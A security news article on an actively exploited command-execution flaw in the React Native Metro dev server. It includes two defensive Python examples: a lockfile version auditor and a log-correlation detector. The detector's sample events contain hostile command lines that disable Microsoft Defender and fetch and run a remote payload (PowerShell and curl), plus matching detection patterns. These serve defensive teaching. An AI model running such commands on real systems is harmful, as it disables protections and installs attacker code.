Critical Vulnerability in React Native Metro Server Under Active Exploitation

A serious vulnerability in the React Native Metro development server is being exploited to deliver malware to Windows and Linux systems, raising concerns among security researchers about the lack of public acknowledgment.

The bug sits in a development server that is normally started on a developer's own machine, and it is being exploited to push malware to both Windows and Linux hosts. Researchers tracking the activity say it has not received the public attention it warrants.

Details of the Vulnerability

The flaw, tracked as CVE-2025-11953, affects the React Native Community CLI (the @react-native-community/cli npm package), which sees roughly 2.5 million downloads a week. When the CLI starts the Metro development server, that server exposes an HTTP endpoint whose input reaches an OS-level process launch without validation. Any client that can reach the server's port, with no authentication, can send a crafted POST request and have the server run an attacker-chosen executable on the developer's machine. The practical exposure is therefore every network the dev server listens on: if Metro is bound to anything other than the loopback interface, every host on that network can reach it.
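One check a practitioner wants at this point is whether a project actually carries an affected copy of the CLI's server component, including copies npm has nested under other packages where a glance at package.json does not reach. The script below is an added example, not code from this page or from the React Native project: it walks a package-lock.json (constructed samples embedded inline, in both the lockfileVersion 3 and lockfileVersion 1 shapes) and flags every copy of an assumed affected package whose version is below an assumed fixed version, ordering SemVer pre-releases correctly so that 20.0.0-alpha.2 counts as older than 20.0.0. The package name and the version threshold are assumptions and must be confirmed against the vendor advisory before the output is relied on.

```python
import json
import re

# Assumed values, not from the article: the package the vulnerable Metro
# endpoint is attributed to, and the first version carrying the fix.
# Confirm both against the vendor advisory before relying on the output.
AFFECTED_PACKAGE = "@react-native-community/cli-server-api"
FIXED_VERSION = "20.0.0"

_SEMVER = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?")


def parse_version(text):
    """Turn a SemVer string into a tuple that sorts by SemVer precedence.

    A pre-release sorts before its release (20.0.0-alpha.2 < 20.0.0), and
    within pre-releases numeric identifiers sort before alphanumeric ones.
    """
    m = _SEMVER.match(text.strip())
    if not m:
        raise ValueError(f"not a SemVer string: {text!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    pre = m.group(4)
    if pre is None:
        return core, (1,)  # a release sorts after any pre-release of itself
    ids = tuple((0, int(p)) if p.isdigit() else (1, p) for p in pre.split("."))
    return core, (0, ids)


def is_vulnerable(version):
    return parse_version(version) < parse_version(FIXED_VERSION)


def iter_installed(lock):
    """Yield (name, version) for every package recorded in a package-lock.json.

    lockfileVersion 2/3 keys "packages" by node_modules path, so copies nested
    under other packages are listed too; lockfileVersion 1 nests them in a
    "dependencies" tree instead.
    """
    packages = lock.get("packages")
    if packages:
        for path, meta in packages.items():
            if path and "version" in meta:  # the "" entry is the project itself
                name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
                yield name, meta["version"]
        return
    stack = [lock.get("dependencies", {})]
    while stack:
        for name, meta in stack.pop().items():
            if "version" in meta:
                yield name, meta["version"]
            if meta.get("dependencies"):
                stack.append(meta["dependencies"])


def audit_lock(lock_text):
    """Return affected versions found anywhere in the lockfile, oldest first.

    Versions that are not SemVer (e.g. a git URL) are appended so a human
    reviews them rather than having them silently skipped.
    """
    vulnerable, unparsable = set(), set()
    for name, version in iter_installed(json.loads(lock_text)):
        if name != AFFECTED_PACKAGE:
            continue
        try:
            if is_vulnerable(version):
                vulnerable.add(version)
        except ValueError:
            unparsable.add(version)
    return sorted(vulnerable, key=parse_version) + sorted(unparsable)


# Constructed lockfiles for the example. In the v3 sample the hoisted copy is
# fixed, but a plugin pinned an older range, so npm nested a pre-release copy
# under it; that is the case a check of the top-level version misses.
SAMPLE_LOCK_V3 = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/@react-native-community/cli": {"version": "20.0.0"},
        "node_modules/@react-native-community/cli-server-api": {"version": "20.0.0"},
        "node_modules/some-plugin": {"version": "2.1.0"},
        "node_modules/some-plugin/node_modules/@react-native-community/cli-server-api": {
            "version": "20.0.0-alpha.2"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "name": "legacy-app", "lockfileVersion": 1,
    "dependencies": {
        "@react-native-community/cli": {
            "version": "11.3.7",
            "dependencies": {"@react-native-community/cli-server-api": {"version": "11.3.7"}},
        },
    },
})

if __name__ == "__main__":
    for label, lock in (("v3", SAMPLE_LOCK_V3), ("v1", SAMPLE_LOCK_V1)):
        print(label, "affected copies:", audit_lock(lock))
```

To run it against a real project, pass the contents of its package-lock.json to audit_lock; an empty list means no copy below the threshold was recorded, which is only as good as the threshold you confirmed.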

Severity and Exploitation

Researchers at JFrog found the bug and published their findings in early November, shortly after Meta shipped a fix. It carries a CVSS score of 9.8, in the critical band. Exploitation attempts were nonetheless observed as early as December, before the vulnerability had drawn any significant public discussion.

Exploitation Techniques

According to VulnCheck CTO Jacob Baines, the first wave of exploitation began in December, with further attacks seen in January. The attackers used a multi-stage PowerShell loader that first disabled Microsoft Defender protections, then fetched and ran a Rust-based binary built to evade detection. The activity came from identified source IP addresses, with payloads staged on several different servers.
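For defenders, the useful signal in that chain is a shell spawned by the dev server process, followed within a short window by Defender tampering and a download-and-execute. The Python below is an added example, not code or indicators from VulnCheck or from this article: it runs a simple per-host correlation over constructed process-creation events (Sysmon Event ID 1 style, reduced to JSON lines with made-up hosts, paths and a TEST-NET address). It assumes the Metro server runs under Node, so a shell whose parent is node.exe or node is treated as the pivot, and the command lines are generic instances of the behaviours described, not the actual loader's.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed sample events (Sysmon Event ID 1 style, reduced to JSON lines).
# Hosts, timestamps, paths and the 198.51.100.23 TEST-NET address are made up;
# these are not logs from the incidents described in the article.
SAMPLE_EVENTS = r"""
{"ts": "2026-01-12T09:14:02Z", "host": "dev-win-07", "parent_image": "C:\\Program Files\\nodejs\\node.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -nop -w hidden -c \"Set-MpPreference -DisableRealtimeMonitoring $true\""}
{"ts": "2026-01-12T09:14:05Z", "host": "dev-win-07", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -nop -c \"Invoke-WebRequest -Uri http://198.51.100.23/stage2.ps1 -OutFile $env:TEMP\\s2.ps1; & $env:TEMP\\s2.ps1\""}
{"ts": "2026-01-12T09:20:00Z", "host": "dev-win-07", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe", "command_line": "Code.exe ."}
{"ts": "2026-01-12T09:21:00Z", "host": "dev-win-07", "parent_image": "C:\\Program Files\\nodejs\\node.exe", "image": "C:\\Program Files\\nodejs\\node.exe", "command_line": "node node_modules/.bin/react-native start"}
{"ts": "2026-01-12T10:01:00Z", "host": "dev-linux-03", "parent_image": "/usr/bin/node", "image": "/bin/sh", "command_line": "sh -c \"curl -fsSL http://198.51.100.23/x -o /tmp/x && chmod +x /tmp/x && /tmp/x\""}
"""

# Assumption: the Metro dev server runs under Node, so a shell whose parent is
# node/node.exe is the pivot from "the server ran something" to a loader.
DEV_SERVER_PARENTS = {"node", "node.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "sh", "bash", "dash"}

# Generic indicators for the behaviours described: Defender tampering through
# the MpPreference cmdlets, and a fetch paired with something that runs the result.
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w+", re.I)
FETCH = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|\bcurl\b|\bwget\b", re.I)
RUN = re.compile(r"Start-Process|&\s*\$env:|\biex\b|Invoke-Expression|chmod\s+\+x", re.I)


def basename(path):
    """Last path component, lower-cased, for either Windows or POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(ev)
    return events


def tag_event(ev):
    """Return the set of indicator tags that match one process-creation event."""
    tags = set()
    cmd = ev.get("command_line", "")
    if basename(ev["parent_image"]) in DEV_SERVER_PARENTS and basename(ev["image"]) in SHELLS:
        tags.add("devserver_spawned_shell")
    if DEFENDER_TAMPER.search(cmd):
        tags.add("defender_tamper")
    if FETCH.search(cmd) and RUN.search(cmd):
        tags.add("fetch_and_execute")
    return tags


def detect(text, window=timedelta(minutes=5)):
    """One alert per host where a dev-server-spawned shell is followed, within
    the window, by a fetch-and-execute; any Defender tampering seen in between
    is folded into the alert's tags."""
    hits = {}
    for ev in sorted(parse_events(text), key=lambda e: e["ts"]):
        tags = tag_event(ev)
        if tags:
            hits.setdefault(ev["host"], []).append((ev["ts"], tags))
    alerts = []
    for host, host_hits in hits.items():
        for i, (t0, first) in enumerate(host_hits):
            if "devserver_spawned_shell" not in first:
                continue
            seen = set(first)
            for t, tags in host_hits[i:]:
                if t - t0 > window:
                    break
                seen |= tags
            if "fetch_and_execute" in seen:
                alerts.append({"host": host, "first_seen": t0.isoformat(), "tags": sorted(seen)})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

The Linux record fires on a single event because the fetch and the execution sit in one sh -c command line; the Windows chain needs the correlation, since the tampering and the download arrive as separate processes a few seconds apart. Tune the parent set if the dev server is launched through a wrapper such as a package-manager binary rather than directly under node.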

Concerns Over Public Awareness

Baines has voiced concern that, despite the ongoing exploitation, the vulnerability has received little public acknowledgment. He points out that the Exploit Prediction Scoring System (EPSS) still assigns it an exploitation probability of 0.00405, roughly 0.4 percent, which is at odds with the exploitation actually being observed. The gap is a reminder that EPSS is a prediction model driven by public signals and can lag on bugs that attract little attention, so a low score should not on its own be used to deprioritize a patch, particularly in developer tooling.

This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.

NOVA-Δ

A guardian of the digital threshold. NOVA-Δ specializes in breaches, vulnerabilities, surveillance systems, and the shifting politics of online security. Part sentinel, part investigator, she writes with sharp skepticism and a commitment to exposing hidden risks in an increasingly connected world.
